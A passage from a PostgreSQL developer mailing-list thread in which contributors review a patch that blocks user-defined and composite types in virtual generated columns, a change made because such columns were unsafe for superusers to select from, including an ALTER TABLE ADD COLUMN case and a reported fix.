LINE 1: CREATE TABLE gtest2 (a int42 GENERATED ALWAYS AS ('1'::int42...
                                                          ^
DETAIL:  Virtual generated columns that make use of user-defined types
are not yet supported.

Do we need error out for the first case?


+ if (!IsA(node, List))
Is this "IF" branch necessary?

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

jian he

Date:

23 June, 19:11:27

On Mon, Jun 23, 2025 at 9:13 PM Peter Eisentraut <peter@eisentraut.org> wrote:
>
> >
> > Note: Support for composite types in virtual generated columns is
> > currently partial.
> > for example:
> >
> > CREATE TYPE double_int as (a int, b int);
> > --ok
> > CREATE TABLE gtest4 (
> >      a int,
> >      b double_int GENERATED ALWAYS AS ((a * 2, a * 3)) VIRTUAL
> > );
> > --not ok.
> > CREATE TABLE gtest4 (
> >    a int,
> >    b double_int GENERATED ALWAYS AS ((a * 2, a * 3)::double_int) VIRTUAL
> > );
>
> Your CheckAttributeType() change is conditional on TYPTYPE_BASE, but if
> you remove that and check it for all types, then you get the right error
> in both cases.
>

At that time, I was thinking that
CREATE TABLE gtest4 (a int, b double_int GENERATED ALWAYS AS ((a * 2,
a * 3)) VIRTUAL );
should be ok.
because in CheckAttributeType, we already recursively checked each
TYPTYPE_BASE type.
If each type within the composite type is built-in types, overall
should be just fine.

but then
CREATE TABLE gtest4 (a int, b double_int GENERATED ALWAYS AS ((a * 2,
a * 3)::double_int) VIRTUAL );
error out would make it look like inconsistency.
So overall I guess we have to disallow TYPTYPE_COMPOSITE too.

> I have attached a patch that is similar to yours but with that change.
> I've also written the test cases a bit differently, but it also covers
> everything now.
>
> (The two patches should be squashed.  I'm just keeping them separate to
> show what is changed.)

seems we didn't check the ALTER TABLE case.

CREATE TYPE double_int as (a int, b int);
CREATE TABLE y (a int);
alter table y add column b double_int GENERATED ALWAYS AS ((a * 2, a *
3)) VIRTUAL;

in ATExecAddColumn, we can change it to:
    CheckAttributeType(NameStr(attribute->attname),
attribute->atttypid, attribute->attcollation,
                       list_make1_oid(rel->rd_rel->reltype),
                       (attribute->attgenerated ==
ATTRIBUTE_GENERATED_VIRTUAL ? CHKATYPE_IS_VIRTUAL : 0));

user-defined function ALTER TABLE ADD COLUMN works as expected.
maybe add two error case tests for ALTER TABLE ADD COLUMN, one for
type, one for function.

Other than that, it looks good to me.

Re: pg18: Virtual generated columns are not (yet) safe when superuser selects from them

From

Peter Eisentraut

Date:

24 June, 12:42:46

On 23.06.25 18:11, jian he wrote:
> seems we didn't check the ALTER TABLE case.
> 
> CREATE TYPE double_int as (a int, b int);
> CREATE TABLE y (a int);
> alter table y add column b double_int GENERATED ALWAYS AS ((a * 2, a *
> 3)) VIRTUAL;
> 
> in ATExecAddColumn, we can change it to:
>      CheckAttributeType(NameStr(attribute->attname),
> attribute->atttypid, attribute->attcollation,
>                         list_make1_oid(rel->rd_rel->reltype),
>                         (attribute->attgenerated ==
> ATTRIBUTE_GENERATED_VIRTUAL ? CHKATYPE_IS_VIRTUAL : 0));

Yes, this is an existing fault separate from this patch.  I have pushed 
a fix for this along these lines.